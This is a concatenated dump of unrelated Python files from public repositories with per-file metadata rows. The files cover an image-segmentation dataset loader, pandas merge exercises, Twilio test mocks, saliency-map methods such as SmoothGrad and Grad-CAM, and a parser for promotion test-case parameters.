        path_img = self.img_path_list[index]
        img_pil = Image.open(path_img).convert('RGB')
        img_pil = img_pil.resize((self.in_size, self.in_size), Image.BILINEAR)
        label_pil = Image.open(path_label).convert('L')
        # NEAREST keeps mask labels crisp (no interpolated values).
        label_pil = label_pil.resize((self.in_size, self.in_size), Image.NEAREST)
        if self.transform is not None:
            img_pil = self.transform(img_pil)
            label_pil = self.transform(label_pil)
        img_hwc = np.array(img_pil)
        img_chw = img_hwc.transpose((2, 0, 1))  # HWC -> CHW for torch
        label_hw = np.array(label_pil)
        label_hw[label_hw != 0] = 1  # binarize the mask to {0, 1}
        label_chw = label_hw[np.newaxis, :, :]
        img_chw_tensor = torch.from_numpy(img_chw).float()
        label_chw_tensor = torch.from_numpy(label_chw).float()
        return img_chw_tensor, label_chw_tensor
    def __len__(self):
        return len(self.label_path_list)
    def _get_img_path(self):
        """Collect image/mask paths and validate that the two sets match up."""
        img_list = glob(self.data_dir + '/image/*')
        label_list = glob(self.data_dir + '/mask/*')
        if len(label_list) == 0:
            raise Exception("\ndata_dir:{} is a empty dir! Please checkout your path to images!".format(self.data_dir))
        if len(label_list) != len(img_list):
            # FIX: the original message used %d placeholders with
            # str.format(), so the counts were never interpolated.
            raise Exception("\nImages {} and labels {} are inconsistent in {}! Please checkout your dataset!".format(
                len(img_list), len(label_list), self.data_dir))
        # FIX: glob returns files in arbitrary filesystem order; sort both
        # lists so index i of images pairs deterministically with index i
        # of masks in __getitem__.
        self.label_path_list = sorted(label_list)
        self.img_path_list = sorted(img_list)
| [
"45333458+HiveYuan@users.noreply.github.com"
] | 45333458+HiveYuan@users.noreply.github.com |
3f3f5ccbe7c5bf0b18fb6e442de445731566796f | 59eaf6824fff579c1cdd89cb8da73f0278f9e2c6 | /subway_data_process/code/divide_train_and_test.py | d243ae7215c6fb4c168a6e0e764e5ad1b9e09f7a | [] | no_license | LinJingOK/BIO-mark | 577cfb3f680583064955d3069de7ab6359f552c8 | 93f7a32405ef7b181bced6a78f9fb7321836fb46 | refs/heads/master | 2023-06-21T20:50:32.517602 | 2021-07-17T04:10:17 | 2021-07-17T04:10:17 | 386,832,445 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 775 | py |
from sklearn.model_selection import train_test_split

# Source file: one labeled example per line.
filename = r'E:\workspace\PycharmProjects\BIO_mark_data\yao\data\data.txt'

# `with` closes the file automatically when the block exits.
with open(filename, 'r') as f:
    data = f.readlines()

# Random 80/20 split into training and test sets.
train_data, test_data = train_test_split(data, train_size=0.8, test_size=0.2)

with open(r"E:\workspace\PycharmProjects\BIO_mark_data\yao\divide_data\train.txt", 'w', encoding='utf-8') as train_outfile:
    train_outfile.writelines(train_data)
with open(r"E:\workspace\PycharmProjects\BIO_mark_data\yao\divide_data\test.txt", 'w', encoding='utf-8') as test_outfile:
    test_outfile.writelines(test_data)
| [
"425626997@qq.com"
] | 425626997@qq.com |
c18be261a9696d001ec6cbdc3a0a4ebb5ac7a186 | 853a642fc706af530a5fc259d11bd143d46678a6 | /pandas_multiple_tables.py | 1b5736bb2b42d0eb1434082de8e53f4d1ec87dbe | [] | no_license | jgullbrand/pandas_practice | faa74599144badb4803d2d6cb91ad99c3d7d131a | 69b236803bfbc0706bd51a206599247daddf189e | refs/heads/master | 2020-04-27T03:47:52.999739 | 2019-03-07T18:42:20 | 2019-03-07T18:42:20 | 174,035,036 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,942 | py | # Pandas Multiple Tables
import pandas as pd

# --- Merging three analytics tables -------------------------------------
# Total visitors, new visitors, and average session duration.
total_visitors = pd.read_csv('visitors.csv')
new_visitors = pd.read_csv('new_visitors.csv')
session_duration = pd.read_csv('session_duration.csv')

# Inner merge on the automatically detected shared column.
all_visitor_data = pd.merge(total_visitors, new_visitors)
# Derived column: share of total visitors that were new, rounded to 2 places.
all_visitor_data['New Visitors Percentage'] = round(
    all_visitor_data.new_website_visitors / all_visitor_data.total_website_visitors, 2)

# Chain merges to combine all three tables in one expression.
all_data = total_visitors.merge(new_visitors).merge(session_duration)
# Normalize the column name so attribute access works below.
all_data.rename(columns={'Session Duration': 'session_duration'}, inplace=True)
# Keep only rows where the average session exceeds 15 seconds.
long_avg_session_duration = all_data[all_data.session_duration > 15]

# --- Customer info + website sales ---------------------------------------
customers = pd.read_csv('customers.csv')
website_sales = pd.read_csv('website_sales.csv')
# Keys have different names in each table: use left_on/right_on.
# Inner join (the default) drops customers without matching sales rows and
# suffixes the duplicated id columns automatically.
customer_sales_data = pd.merge(customers, website_sales,
                               left_on='id', right_on='customer_id')
# Outer join keeps unmatched rows from both sides; explicit suffixes
# disambiguate the two id columns.
all_customer_sales_data = pd.merge(customers, website_sales,
                                   left_on='id', right_on='customer_id',
                                   how='outer',
                                   suffixes=['_customers', '_sales'])
# Rows for customers that have no sales data at all, and their count.
null_sales_data = all_customer_sales_data[all_customer_sales_data.total_sales.isnull()]
count_null_sales_data = len(null_sales_data)
# Left join: every customer, with sales attached where available.
customer_data_left_merge = pd.merge(customers, website_sales,
                                    left_on='id', right_on='customer_id',
                                    how='left',
                                    suffixes=['_customers', '_sales'])
# Right join: every sale, with customer info attached where available.
customer_data_left_right = pd.merge(customers, website_sales,
                                    left_on='id', right_on='customer_id',
                                    how='right',
                                    suffixes=['_customers', '_sales'])

# --- Concatenating DataFrames --------------------------------------------
# Stack two customer tables vertically and renumber the index.
customers = pd.read_csv('customers.csv')
customers_two = pd.read_csv('customers_two.csv')
combined_customer_data = pd.concat([customers, customers_two]).reset_index(drop=True)
print(combined_customer_data)
| [
"jamiegullbrand@gmail.com"
] | jamiegullbrand@gmail.com |
30fc26e6e36c45d244ad025f815fe97fb27bdda0 | 930c7154b221dd0133766263efc8afab1aaed914 | /tests/base.py | 3696a41433129f466f43bff2d350ef613147ed1d | [
"LicenseRef-scancode-warranty-disclaimer",
"MIT"
] | permissive | isabella232/ri-group-communication-toolkit | f212c92ec52e2e09cc065b08796f1bf988f08e5b | 9b0cc2f151f12ba072b3a932099b796e89d67009 | refs/heads/master | 2023-04-12T23:29:22.551824 | 2014-04-24T23:45:15 | 2014-04-24T23:45:15 | 358,573,545 | 1 | 1 | null | 2021-04-16T11:16:59 | 2021-04-16T11:15:15 | null | UTF-8 | Python | false | false | 774 | py | from unittest import TestCase
from mock import patch, Mock
class KitTestCase(TestCase):
    """Base TestCase that stubs out a toolkit module's twilio helpers."""

    def start_patch(self, tool):
        """Activate patches for ``tool``'s twilio_numbers() and twilio() helpers."""
        # twilio_numbers() -> [] so no real phone numbers are fetched.
        numbers_target = 'rapid_response_kit.tools.{}.twilio_numbers'.format(tool)
        self.twilio_numbers_patcher = patch(numbers_target)
        self.twilio_numbers_patch = self.twilio_numbers_patcher.start()
        self.twilio_numbers_patch.return_value = []
        # twilio() -> a Mock client, kept on self.patchio for assertions.
        client_target = 'rapid_response_kit.tools.{}.twilio'.format(tool)
        self.twilio_patcher = patch(client_target)
        self.twilio_patch = self.twilio_patcher.start()
        self.patchio = Mock()
        self.twilio_patch.return_value = self.patchio

    def stop_patch(self):
        """Deactivate both patches started by start_patch()."""
        self.twilio_numbers_patcher.stop()
        self.twilio_patcher.stop()
| [
"matt@twilio.com"
] | matt@twilio.com |
6a370d78124dbc1a87f7a1d28a4f4f21efd1fbe4 | 33fec8d24705bc2c0a1502d55b610b6645326278 | /bin/sqlformat | deb363fd5ad0692549e972167397f58755f730c9 | [] | no_license | bramsteenbergen/ProductManagar | 402899e69bd9554088e09ecda69654dfb1ed8cf1 | ea20539ee61c92afb3edd22b37864de7205341b0 | refs/heads/master | 2022-12-09T05:11:10.135943 | 2020-09-24T05:33:25 | 2020-09-24T05:33:25 | 288,982,305 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 242 | #!/home/trie/Desktop/Dev/testEnv/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
from sqlparse.__main__ import main
if __name__ == '__main__':
    # Strip setuptools' "-script.pyw"/".exe" suffix from argv[0] so usage
    # messages show the plain command name, then run sqlparse's CLI.
    sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
    sys.exit(main())
| [
"triemond@outlook.com"
] | triemond@outlook.com | |
3b9318472539ec290ac5c2d9f2f2b21c8d5e35c8 | b7eed26cf8a0042a61f555eed1e9bf0a3227d490 | /students/lakatorz_izaak/lesson_06_dicts_tuples_sets_args_kwargs/countries_and_cities.py | 38dcb815c191412dfaa63d982415397d1c37151c | [] | no_license | jedzej/tietopythontraining-basic | e8f1ac5bee5094c608a2584ab19ba14060c36dbe | a68fa29ce11942cd7de9c6bbea08fef5541afa0f | refs/heads/master | 2021-05-11T11:10:05.110242 | 2018-08-20T12:34:55 | 2018-08-20T12:34:55 | 118,122,178 | 14 | 84 | null | 2018-08-24T15:53:04 | 2018-01-19T12:23:02 | Python | UTF-8 | Python | false | false | 490 | py | def main():
    # city -> country lookup built from the first half of the input.
    cc_pairs = dict()
    # query index -> country name, preserving query order for the output.
    results = dict()
    country_number = int(input())
    for i in range(country_number):
        # Each line: "<country> <city> <city> ...", country is the first token.
        country_name, cities = input().split(' ', 1)
        for city in cities.split():
            cc_pairs[city] = country_name
    city_number = int(input())
    for i in range(city_number):
        city_to_check = input()
        results[i] = cc_pairs[city_to_check]
    for v in results.values():
        print(v)
if __name__ == '__main__':
    main()
| [
"ext-izaak.lakatorz@here.com"
] | ext-izaak.lakatorz@here.com |
023a07fe0e546c56cc62618d41f849445a7aff55 | dec17e1df09b5b6426bef5d67cbe555031018317 | /lib/gradients.py | 9c2e579bb2f5104882421e9891045ed4cdd286dc | [
"MIT"
] | permissive | codeaudit/pytorch-smoothgrad | 364b3d8852f867b93b74c9b6940af399a9a59a33 | d6bb9f96ea8f59f89e72fb2136d8d48e0713eca0 | refs/heads/master | 2021-01-01T20:18:02.842154 | 2017-07-28T15:28:38 | 2017-07-28T15:28:38 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,969 | py | import numpy as np
import cv2
import torch
from torch.autograd import Variable
class VanillaGrad(object):
    """Plain input-gradient saliency: d(score[index]) / d(input).

    NOTE(review): written against the pre-0.4 PyTorch API (Variable,
    backward(retain_variables=...)); newer releases renamed these -- confirm
    the pinned torch version before touching this.
    """

    def __init__(self, pretrained_model, cuda=False):
        # Keep the model (and its `features` sub-module) and put it in eval mode.
        self.pretrained_model = pretrained_model
        self.features = pretrained_model.features
        self.cuda = cuda
        if self.cuda:
            self.pretrained_model.cuda()
        self.pretrained_model.eval()

    def __call__(self, x, index=None):
        """Return the gradient of class `index` (default: argmax) w.r.t. `x`.

        `x` must require grad; the result is `x.grad` with the leading batch
        dimension stripped (the [0, :, :, :] indexing assumes batch size 1).
        """
        output = self.pretrained_model(x)
        if index is None:
            index = np.argmax(output.data.cpu().numpy())
        # One-hot vector selecting the target class score.
        one_hot = np.zeros((1, output.size()[-1]), dtype=np.float32)
        one_hot[0][index] = 1
        one_hot = Variable(torch.from_numpy(one_hot), requires_grad=True)
        if self.cuda:
            one_hot = one_hot.cuda()
        one_hot = torch.sum(one_hot * output)
        one_hot.backward(retain_variables=True)
        grad = x.grad.data.cpu().numpy()
        grad = grad[0, :, :, :]
        return grad
class SmoothGrad(VanillaGrad):
    """SmoothGrad saliency: average the (optionally squared) vanilla gradients
    over `n_samples` noisy copies of the input.
    """

    def __init__(self, pretrained_model, cuda=False, stdev_spread=0.15, n_samples=25, magnitude=True):
        super(SmoothGrad, self).__init__(pretrained_model, cuda)
        # stdev_spread: noise std expressed as a fraction of the input's value range.
        self.stdev_spread = stdev_spread
        self.n_samples = n_samples
        # NOTE(review): attribute name is misspelled ("magnitutde") but is what
        # __call__ below and GuidedBackpropSmoothGrad read -- keep as is.
        self.magnitutde = magnitude

    def __call__(self, x, index=None):
        x = x.data.cpu().numpy()
        # Noise std scaled by the dynamic range of this particular input.
        stdev = self.stdev_spread * (np.max(x) - np.min(x))
        total_gradients = np.zeros_like(x)
        for i in range(self.n_samples):
            noise = np.random.normal(0, stdev, x.shape).astype(np.float32)
            x_plus_noise = x + noise
            x_plus_noise = Variable(torch.from_numpy(x_plus_noise), requires_grad=True)
            if self.cuda:
                x_plus_noise = x_plus_noise.cuda()
            output = self.pretrained_model(x_plus_noise)
            if index is None:
                # Resolved on the first noisy sample, then reused for the rest.
                index = np.argmax(output.data.cpu().numpy())
            one_hot = np.zeros((1, output.size()[-1]), dtype=np.float32)
            one_hot[0][index] = 1
            one_hot = Variable(torch.from_numpy(one_hot), requires_grad=True)
            if self.cuda:
                one_hot = one_hot.cuda()
            one_hot = torch.sum(one_hot * output)
            if x_plus_noise.grad is not None:
                x_plus_noise.grad.data.zero_()
            one_hot.backward(retain_variables=True)  # legacy (<0.4) torch API
            grad = x_plus_noise.grad.data.cpu().numpy()
            if self.magnitutde:
                # Squared gradients emphasize magnitude over sign.
                total_gradients += (grad * grad)
            else:
                total_gradients += grad
        # Mean over samples, batch dimension stripped (assumes batch size 1).
        avg_gradients = total_gradients[0, :, :, :] / self.n_samples
        return avg_gradients
class GuidedBackpropReLU(torch.autograd.Function):
    """ReLU whose backward pass only passes gradient where BOTH the forward
    input and the incoming gradient are positive (guided backpropagation).

    NOTE(review): legacy stateful autograd.Function style; modern PyTorch
    requires @staticmethod forward/backward with a ctx argument.
    """

    def forward(self, input):
        # output = input * (input > 0), built via addcmul on a zero tensor.
        pos_mask = (input > 0).type_as(input)
        output = torch.addcmul(
            torch.zeros(input.size()).type_as(input),
            input,
            pos_mask)
        self.save_for_backward(input, output)
        return output

    def backward(self, grad_output):
        input, output = self.saved_tensors
        # Two masks: forward input > 0 and incoming gradient > 0.
        pos_mask_1 = (input > 0).type_as(grad_output)
        pos_mask_2 = (grad_output > 0).type_as(grad_output)
        # grad_input = grad_output * pos_mask_1 * pos_mask_2.
        grad_input = torch.addcmul(
            torch.zeros(input.size()).type_as(input),
            torch.addcmul(torch.zeros(input.size()).type_as(input), grad_output, pos_mask_1),
            pos_mask_2)
        return grad_input
class GuidedBackpropGrad(VanillaGrad):
    """Vanilla gradient with every ReLU in `features` swapped for the
    guided-backprop variant, so only positive gradients flow back."""

    def __init__(self, pretrained_model, cuda=False):
        super(GuidedBackpropGrad, self).__init__(pretrained_model, cuda)
        for idx, module in self.features._modules.items():
            # Fix: compare class names with `==`; the original used `is`,
            # which only worked by CPython string-interning accident and
            # raises SyntaxWarning on Python 3.8+.
            if module.__class__.__name__ == 'ReLU':
                self.features._modules[idx] = GuidedBackpropReLU()
class GuidedBackpropSmoothGrad(SmoothGrad):
    """SmoothGrad with every ReLU in `features` replaced by the
    guided-backprop ReLU."""

    def __init__(self, pretrained_model, cuda=False, stdev_spread=.15, n_samples=25, magnitude=True):
        super(GuidedBackpropSmoothGrad, self).__init__(pretrained_model, cuda)
        # Re-apply the noise settings (the base __init__ was called without them).
        self.stdev_spread = stdev_spread
        self.n_samples = n_samples
        self.magnitutde = magnitude  # NOTE: misspelled name is what SmoothGrad.__call__ reads
        for idx, module in self.features._modules.items():
            # Fix: compare class names with `==`; the original used `is`,
            # which only worked by CPython string-interning accident and
            # raises SyntaxWarning on Python 3.8+.
            if module.__class__.__name__ == 'ReLU':
                self.features._modules[idx] = GuidedBackpropReLU()
class FeatureExtractor(object):
    """Run a model while capturing activations (and, via hooks, gradients)
    of selected layers inside ``model.features``."""

    def __init__(self, model, target_layers):
        self.model = model
        self.features = model.features
        self.target_layers = target_layers
        self.gradients = []

    def __call__(self, x):
        """Forward pass returning (captured target activations, classifier output)."""
        target_activations, features_out = self.extract_features(x)
        flattened = features_out.view(features_out.size(0), -1)
        logits = self.model.classifier(flattened)
        return target_activations, logits

    def get_gradients(self):
        """Gradients captured so far, in hook-invocation order."""
        return self.gradients

    def save_gradient(self, grad):
        # Hook target: remember the gradient that flowed through a target layer.
        self.gradients.append(grad)

    def extract_features(self, x):
        """Push `x` through every feature sub-module, collecting the outputs
        of layers named in ``target_layers`` (each gets a gradient hook)."""
        captured = []
        for name, module in self.features._modules.items():
            x = module(x)
            if name in self.target_layers:
                x.register_hook(self.save_gradient)
                captured.append(x)
        return captured, x
class GradCam(object):
    """Grad-CAM heat map: weight target-layer activations by the spatial mean
    of their gradients for the chosen class, then ReLU + min/max normalize.
    """

    def __init__(self, pretrained_model, target_layer_names, cuda):
        self.pretrained_model = pretrained_model
        self.cuda = cuda
        if self.cuda:
            self.pretrained_model.cuda()
        self.pretrained_model.eval()
        # Wrapper that records activations/gradients of the target layers.
        self.extractor = FeatureExtractor(self.pretrained_model, target_layer_names)

    def __call__(self, x, index=None):
        """Return a (224, 224) float32 map in [0, 1] for class `index` (default: argmax)."""
        #output = self.pretrained_model(x)
        features, output = self.extractor(x)
        if index is None:
            index = np.argmax(output.data.cpu().numpy())
        # One-hot selection of the target class score.
        one_hot = np.zeros((1, output.size()[-1]), dtype=np.float32)
        one_hot[0][index] = 1
        one_hot = Variable(torch.from_numpy(one_hot), requires_grad=True)
        if self.cuda:
            one_hot = one_hot.cuda()
        one_hot = torch.sum(one_hot * output)
        self.pretrained_model.zero_grad()
        one_hot.backward(retain_variables=True)  # legacy (<0.4) torch API
        # Gradients/activations of the last captured target layer, batch 0.
        grads = self.extractor.get_gradients()[-1].data.cpu().numpy()
        target = features[-1].data.cpu().numpy()[0, :]
        # Channel weights: global average of the gradients over spatial dims.
        weights = np.mean(grads, axis=(2, 3))[0, :]
        # NOTE(review): accumulation starts from ones (not zeros), biasing
        # every pixel by +1 before the ReLU -- looks deliberate but unusual;
        # confirm against the reference Grad-CAM implementation.
        cam = np.ones(target.shape[1:], dtype=np.float32)
        for i, w in enumerate(weights):
            cam += w * target[i, :, :]
        cam = np.maximum(cam, 0)
        cam = cv2.resize(cam, (224, 224))
        cam = cam - np.min(cam)
        cam = cam / np.max(cam)
        return cam
| [
"pkdn14@gmail.com"
] | pkdn14@gmail.com |
3bf3d5decb996dc83da753ea3597dd1bbbc55da4 | 12fdd1d25aedf9ee00199373606991f92c28ed66 | /util/param_parser/param_parser.py | 3877336d651d5bf3941a64fc13d2a422cb5872b3 | [] | no_license | SHOST628/ESPOS82_Promotion_AutoTest | ff0e6eb038c3ca349fa666bad0b89fb65d6b71ff | df7d9614d132141738d301279bbacab8be6e4fbc | refs/heads/master | 2023-04-05T12:42:17.760953 | 2021-04-20T07:18:56 | 2021-04-20T07:18:56 | 335,235,603 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 16,282 | py | from util.mylogger import logger
from util.oracle import oracle
from util.param_format_log import param_model
import re
# Selector values for get_param_to_dict's request_response argument:
# 0 -> parse the request half of PROMPARAM_XX, 1 -> parse the response half.
REQUEST = 0
RESPONSE = 1
def param_extractor(prom_param, config_prom_param):
    """
    Extract the configured promotion parameters that occur (as '-NAME'
    tokens) inside a promotion parameter string.
    :param prom_param: str, promotion parameter text (e.g. from xf_parameter0)
    :param config_prom_param: str, comma separated names from config.ini
    :return: de-duplicated list of matching parameter names (order undefined)
    """
    if config_prom_param is None or config_prom_param == '':
        return []
    # Each configured name is searched as a '-NAME' token.
    tokens = ['-' + name.strip() for name in config_prom_param.split(',')]
    matcher = re.compile('|'.join(tokens))
    hits = matcher.findall(prom_param)
    return list({hit.replace('-', '') for hit in hits})
def param_extractors(promids, config_prom_param):
    """
    Collect the promotion parameter text of every promid from the database
    and extract the configured parameter names from the combined text.
    :param promids: list of promotion ids
    :param config_prom_param: str, comma separated names from config.ini
    :return: de-duplicated list of common promotion parameter names
    """
    combined = ''
    for promid in promids:
        query = "select xf_parameter0 from xf_promitem where xf_promid = '{}'".format(promid)
        combined += oracle.select(query)[0][0]
    return param_extractor(combined, config_prom_param)
def to_dict(test_cls, key, value):
    """
    Parse a comma separated 'k=v' string (e.g. testcase['VIPINFO'] or
    testcase['PROMLESSDETAIL']) into a dict:
        'promid=10001,vipgradecenter=*' -> {'promid': '10001', 'vipgradecenter': '*'}
        'PEOHQO200900015=100&50,PEOHQO201100031=130'
            -> {'PEOHQO200900015': ['100', '50'], 'PEOHQO201100031': '130'}
    Keys without digits are lower-cased; '&' inside a value yields a list.
    Malformed input is reported on test_cls and the current test is skipped.
    :param test_cls: running TestCase (used only on malformed input)
    :param key: testcase column name, used in error messages
    :param value: raw testcase string
    :return: parsed dict, or None when value is empty/blank
    """
    if value is None or value.strip() == '':
        logger.debug('TESTCASE 中 【{}】的值为空 '.format(key))
        return
    if '=' in value:
        # Well-formed input has exactly one '=' per comma separated pair.
        if value.count('=') == value.count(',') + 1:
            parsed = {}
            for pair in value.split(','):
                k, v = pair.split('=')
                if k.strip() == '' or v.strip() == '':
                    test_cls._testMethodDoc += "<br><font color='red' style='font-weight:bold'> TESTCASE 下【{}】的值为:{} ,填写格式不正确 </font>".format(key, value)
                    test_cls._testMethodDoc += param_model(key)
                    test_cls.skipTest('TESTCASE 下【{}】的值为:{} ,填写格式不正确'.format(key, value))
                if re.search(r'\d+', k.strip()) is None:
                    k = k.lower().strip()
                else:
                    k = k.strip()
                v = v.strip()
                if '&' in v:
                    # PROMLESSDETAIL style: '&' separates multiple values.
                    v = [part.strip() for part in v.split('&')]
                parsed[k] = v
            return parsed
        test_cls._testMethodDoc += "<br><font color='red' style='font-weight:bold'> TESTCASE 下【{}】的值为:{} ,填写格式不正确</font>".format(key, value)
        test_cls._testMethodDoc += param_model(key)
        test_cls.skipTest('TESTCASE 下【{}】的值为:{} ,填写格式不正确'.format(key, value))
    test_cls._testMethodDoc += "<br><font color='red' style='font-weight:bold'> TESTCASE 下【{}】的值为:{} ,填写格式不正确 </font>".format(key, value)
    test_cls._testMethodDoc += param_model(key)
    test_cls.skipTest('TESTCASE 下【{}】的值为:{} ,填写格式不正确'.format(key, value))
def _param_to_dict(test_cls, key, value, request_response):
    """
    Parse a PROMPARAM_XX testcase string of the form '<request>;<response>'.

    Symbol priority: ; > # > : > , > =
    Examples:
        ';PEOHQO201100036:bonusGive=1070'
            -> {'response': {'PEOHQO201100036': {'bonusGive': '1070'}}}
        ';PEOHQO210400007:batchs={batchNo=HQ003,qty=1#batchNo=HQ004,qty=1},packCode=01'
            -> {'response': {'PEOHQO210400007': {'batchs': [...], 'packCode': '01'}}}

    :param test_cls: running TestCase (used for skip/report on bad input)
    :param key: testcase column name, used in error messages
    :param value: raw PROMPARAM_XX string
    :param request_response: truthy -> parse the response half, falsy -> request half
    :return: {'request': ...} or {'response': ...}; None when value is empty
    """
    bad_format_doc = ("<br><font color='red' style='font-weight:bold'> TESTCASE 下"
                      "【{}】的值为:{} ,填写格式不正确</font>")
    bad_format_msg = 'TESTCASE 下【{}】的值为:{} ,填写格式不正确'
    if value is None or value.strip() == '':
        logger.debug('TESTCASE 中 【{}】的值为空 '.format(key))
        return
    if ';' not in value:
        test_cls._testMethodDoc += bad_format_doc.format(key, value)
        test_cls._testMethodDoc += param_model(key)
        test_cls.skipTest(bad_format_msg.format(key, value))
        return
    if value.count(';') > 1:
        test_cls._testMethodDoc += ("<br><font color='red' style='font-weight:bold'> TESTCASE 下"
                                    "【{}】的值为:{} ,填写格式不正确,不能存在两个或以上的 ';'</font>").format(key, value)
        test_cls._testMethodDoc += param_model(key)
        test_cls.skipTest("【{}】的值为:{} ,填写格式不正确,不能存在两个或以上的 ';'".format(key, value))
    req, res = value.split(';')
    result = {}
    if request_response:
        # ---- response half: '#'-separated '<promid>:<k=v,...>' assertions ----
        res = res.strip()
        assertions = {}
        # Protect any '{...}' batch blocks (-XP style) from the '#' split by
        # masking each with the literal token 'batchs' first.
        batch_blocks = re.compile(r'\{.*?\}').findall(res)
        if batch_blocks != []:
            masked = re.sub('|'.join(batch_blocks), 'batchs', res)
        else:
            masked = res
        for segment in masked.split('#'):
            if segment is None or segment.strip() == '':
                continue
            if ':' not in segment:
                test_cls._testMethodDoc += bad_format_doc.format(key, value)
                test_cls._testMethodDoc += param_model(key)
                test_cls.skipTest(bad_format_msg.format(key, value))
                continue
            pieces = segment.split(':')
            promid = pieces[0]
            raw_checks = pieces[1]
            if promid is None or promid.strip() == '':
                test_cls._testMethodDoc += bad_format_doc.format(key, value)
                test_cls._testMethodDoc += param_model(key)
                test_cls.skipTest(bad_format_msg.format(key, value))
            elif raw_checks is None or raw_checks.strip() == '':
                test_cls._testMethodDoc += bad_format_doc.format(key, value)
                test_cls._testMethodDoc += param_model(key)
                test_cls.skipTest(bad_format_msg.format(key, value))
            else:
                parsed = to_dict(test_cls, key, raw_checks)
                if parsed is None:
                    test_cls._testMethodDoc += bad_format_doc.format(key, value)
                    test_cls._testMethodDoc += param_model(key)
                    test_cls.skipTest(bad_format_msg.format(key, value))
                else:
                    assertions[promid] = parsed
            result['response'] = assertions
        if batch_blocks != []:
            # Re-expand each masked 'batchs' token into a list of parsed batch
            # dicts, pairing blocks with promids in insertion order.
            i = 0
            for promid, checks in result['response'].items():
                inner = batch_blocks[i].lstrip('{').rstrip('}')
                parsed_batches = []
                for entry in inner.split('#'):
                    if entry.strip() == '':
                        continue
                    parsed_batches.append(to_dict(test_cls, key, entry.strip()))
                result['response'][promid]['batchs'] = parsed_batches
                i += 1
        return result
    # ---- request half: '#' separates alternative request dicts ----
    req = req.strip()
    if '#' in req:
        result['request'] = []
        for chunk in req.split('#'):
            if chunk.strip() == '':
                continue
            result['request'].append(to_dict(test_cls, key, chunk.strip()))
    else:
        result['request'] = to_dict(test_cls, key, req.strip())
    return result
def get_param_to_dict(test_cls, key, testcase, request_response, *need_params):
    """
    Parse the PROMPARAM_XX column of every testcase row, verifying that each
    non-empty value mentions every name in ``need_params``.

    :param test_cls: running TestCase (skipped when data is incomplete)
    :param key: testcase column name to read (e.g. 'PROMPARAM_XE')
    :param testcase: iterable of row mappings
    :param request_response: 0 -> request half, 1 -> response half
    :param need_params: parameter names that must all occur in the value
    :return: list with one {'request': ...} / {'response': ...} dict per row
             (None payload for empty rows)
    """
    Flag = True
    # need_params_ = ['\b{}\b'.format(param) for param in need_params]
    # Alternation pattern over the required names (substring, case-insensitive).
    need_params_ = ['{}'.format(param) for param in need_params]
    need_param = '|'.join(need_params_)
    results = []
    test_method_doc = "<br><font color='red' style='font-weight:bold'>TestCase中【{}】的数据需要包含:{}</font>"
    skip_test_info = "TestCase 中 {} 的数据需要包含: {}"
    for i, row in enumerate(testcase):
        if row[key] is None:
            # Empty cell: record a None payload of the requested kind.
            if request_response == 0:
                results.append({'request': None})
            else:
                results.append({'response': None})
        elif row[key].strip() == '':
            if request_response == 0:
                results.append({'request': None})
            else:
                results.append({'response': None})
        # Row is complete only when every required name matches at least once
        # (distinct matches counted via set()).
        elif len(list(set(re.findall(r'{}'.format(need_param), row[key], flags=re.IGNORECASE)))) == len(need_params):
            if re.findall(need_param, row[key], flags=re.IGNORECASE):
                # todo 判断PROMPARAM_XX 的value是否存在需要的促销参数
                promparam = _param_to_dict(test_cls, key, row[key], request_response)
                # At least one row carried real data.
                Flag = False
                if request_response == 0:
                    results.append(promparam)
                else:
                    results.append(promparam)
            else:
                test_cls._testMethodDoc += test_method_doc.format(key, ','.join(need_params))
                test_cls._testMethodDoc += param_model(key)
                test_cls.skipTest(skip_test_info.format(key, ','.join(need_params)))
        else:
            test_cls._testMethodDoc += test_method_doc.format(key, ','.join(need_params))
            test_cls._testMethodDoc += param_model(key)
            test_cls.skipTest(skip_test_info.format(key, ','.join(need_params)))
    # No row contained usable data at all -> skip the test.
    if Flag:
        test_cls._testMethodDoc += test_method_doc.format(key, ','.join(need_params))
        test_cls._testMethodDoc += param_model(key)
        test_cls.skipTest(skip_test_info.format(key, ','.join(need_params)))
    return results
def exclude_case(test_cls, testcaseid, skip_caseids):
    """
    Skip the running test when ``testcaseid`` appears in ``skip_caseids``.

    ``skip_caseids`` is a comma separated string of case ids and/or
    ``low-high`` id ranges (inclusive, compared as strings), e.g.
    ``'001, 003, 010-020'``.

    :param test_cls: running TestCase (skipTest is called on a match)
    :param testcaseid: id of the current case
    :param skip_caseids: str of excluded ids / ranges; blank disables exclusion
    :return: None
    """
    if skip_caseids.strip() == '':
        return
    exact_ids = []
    id_ranges = []
    for token in skip_caseids.split(','):
        if '-' in token:
            parts = token.split('-')
            low = parts[0].strip()
            high = parts[1].strip()
            if low != '' and high != '':
                if high < low:
                    low, high = high, low
                id_ranges.append([low, high])
        else:
            # Bug fix: ids were collected unstripped (and range tokens were
            # also added), so ' 002' in '001, 002' never matched. Strip and
            # collect only plain ids, mirroring only_test_case().
            exact_ids.append(token.strip())
    if testcaseid in exact_ids:
        test_cls.skipTest('属于指定排除的TestCase')
    elif id_ranges != []:
        for low, high in id_ranges:
            if low <= testcaseid <= high:
                test_cls.skipTest('跳过执行被指定排除的TestCase')
def exclude_param_case(test_cls, exclude_param, common_params):
    """
    Skip the running test when any name in ``exclude_param`` (comma separated
    string) also occurs in ``common_params`` (list of parameter names).
    :param test_cls: running TestCase (skipTest is called on overlap)
    :param exclude_param: str; empty string disables the check
    :param common_params: list of parameter names present in the case
    :return: None
    """
    if exclude_param == '':
        return
    excluded = {token.strip() for token in exclude_param.split(',') if token.strip() != ''}
    if excluded & set(common_params):
        test_cls.skipTest('跳过执行该TestCase,包含需要被排除的参数: {}'.format(exclude_param))
# TODO: refactor -- extract the shared id-list / id-range parsing (the
# only_test_caseids_tmp / only_test_caseids_range logic) into a common helper.
# TODO: have the testcases call this function by reference instead of inline.
def only_test_case(test_cls, testcaseid, only_test_caseids, desci=''):
    """
    Skip the running test unless ``testcaseid`` is listed in
    ``only_test_caseids`` (comma separated ids and/or ``low-high`` ranges,
    inclusive, compared as strings). Blank string disables the filter.
    :param test_cls: running TestCase (skipTest is called when not listed)
    :param testcaseid: id of the current case
    :param only_test_caseids: str whitelist of ids / ranges
